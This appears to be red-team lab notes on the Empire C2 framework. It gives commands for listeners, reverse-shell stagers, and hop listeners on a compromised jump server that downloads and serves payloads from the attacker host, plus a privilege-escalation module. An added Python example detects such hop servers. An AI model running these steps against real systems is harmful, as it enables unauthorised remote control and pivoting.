# C2

There are many different [C2](https://howto.thec2matrix.com/) frameworks. They can be hosted in the cloud for collaborative red teams.

## Empire

Empire components:

* **Listeners** are well... listeners. They listen for a connection and facilitate further exploitation
* **Stagers** are essentially payloads generated by Empire to create a robust reverse shell in conjunction with a listener. They are the delivery mechanism for agents
* **Agents** are the equivalent of a **Metasploit** "Session". They are connections to compromised targets, and allow an attacker to further interact with the system
* **Modules** are used in conjunction with agents to perform further exploitation. For example, they can work through an existing agent to dump the password hashes from the server

### Listeners

```bash
uselistener http
set Name CLIHTTP
set Host 10.10.14.8
set Port 8000
execute
listeners
```

{% hint style="info" %}
Stop a listener using `kill CLIHTTP`
{% endhint %}

<figure><img src="/files/IZswb1alVFembmMRVisA" alt=""><figcaption><p>GUI Alternative</p></figcaption></figure>

## Stagers

Stagers are essentially Empire's payloads used to connect back to the C2 server and create an agent.

#### Linux Machines

```
usestager multi/bash
set Listener CLIHTTP
execute
```

<figure><img src="/files/i4e605SDNGkAXfesHFaB" alt=""><figcaption><p>GUI Alternative</p></figcaption></figure>

## Agents

Upload and run the payload on the target machine, then check for the new agent:

```
agents
interact [ID]
help
```

## Hop Listeners

Hop listeners create files to be copied across to the **compromised "jump" server** and served from there. The files contain instructions to connect back to our C2 listener.

```
uselistener http_hop
set RedirectListener CLIHTTP
set Host 10.200.101.200
set Port 47000
```

`Host` is the compromised webserver IP. The port should be above 15000.

<figure><img src="/files/DorO99TlrJ2CgsTAZ502" alt=""><figcaption><p>GUI Alternative</p></figcaption></figure>

### Hop Listener Stager

```
usestager multi/launcher
set Listener http_hop
execute
```

#### Jump server (compromised webserver) setup

On the attacker machine:

```
cd /tmp/http_hop
sudo zip -r hop.zip *
python3 -m http.server 80
```

On the jump server:

```
mkdir /tmp/hop-adot8 && cd /tmp/hop-adot8
curl http://10.50.102.164/hop.zip -o hop.zip
unzip hop.zip
# Serves the PHP payloads (php must be installed)
php -S 0.0.0.0:47000 &
firewall-cmd --zone=public --add-port 47000/tcp
```
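
Seen from the defender's side, the jump-server steps above leave a recognisable trace: PHP's built-in web server bound to a non-loopback address from a scratch directory, plus a firewall rule opened for the same port. The Python below is an added example, not part of the original notes; the event records and their field names (`host`, `cwd`, `cmd`) are constructed for illustration.

```python
import re
import shlex

# Constructed process-execution records (for example distilled from auditd
# execve events); the field names are assumptions made for this example.
SAMPLE_EVENTS = [
    {"host": "web01", "cwd": "/tmp/hop-adot8", "cmd": "unzip hop.zip"},
    {"host": "web01", "cwd": "/tmp/hop-adot8", "cmd": "php -S 0.0.0.0:47000"},
    {"host": "web01", "cwd": "/tmp/hop-adot8",
     "cmd": "firewall-cmd --zone=public --add-port 47000/tcp"},
    {"host": "dev02", "cwd": "/home/dev/site", "cmd": "php -S 127.0.0.1:8080"},
    {"host": "db03", "cwd": "/root", "cmd": "firewall-cmd --add-port=5432/tcp"},
]

SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")   # world-writable locations
LOOPBACK = ("127.0.0.1", "localhost", "[::1]")
ADD_PORT = re.compile(r"--add-port[= ](\d+)/tcp")


def php_server_bind(cmd):
    """Return (address, port) if cmd starts PHP's built-in web server."""
    argv = shlex.split(cmd)
    if not argv or not re.fullmatch(r"php[\d.]*", argv[0].rsplit("/", 1)[-1]):
        return None
    if "-S" not in argv or argv.index("-S") + 1 >= len(argv):
        return None
    addr, _, port = argv[argv.index("-S") + 1].rpartition(":")
    return (addr, int(port)) if port.isdigit() else None


def find_hop_servers(events):
    """Flag non-loopback `php -S` servers started from scratch directories."""
    # Ports opened with firewall-cmd, keyed by host, for correlation.
    opened = {(e["host"], int(m.group(1)))
              for e in events if (m := ADD_PORT.search(e["cmd"]))}
    findings = []
    for e in events:
        bind = php_server_bind(e["cmd"])
        if bind is None or bind[0] in LOOPBACK:
            continue  # not a PHP dev server, or only reachable locally
        if not e["cwd"].startswith(SCRATCH_DIRS):
            continue  # developers serving from a project directory
        findings.append({"host": e["host"], "port": bind[1], "cwd": e["cwd"],
                         "firewall_opened": (e["host"], bind[1]) in opened})
    return findings


if __name__ == "__main__":
    for finding in find_hop_servers(SAMPLE_EVENTS):
        print(finding)
```
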

Execute the payload on the internal target.

## Modules

PowerUp Invoke-AllChecks example:

```
usemodule powershell_privesc_powerup_allchecks
set Agent [ID]
execute
agents
interact [ID]
```

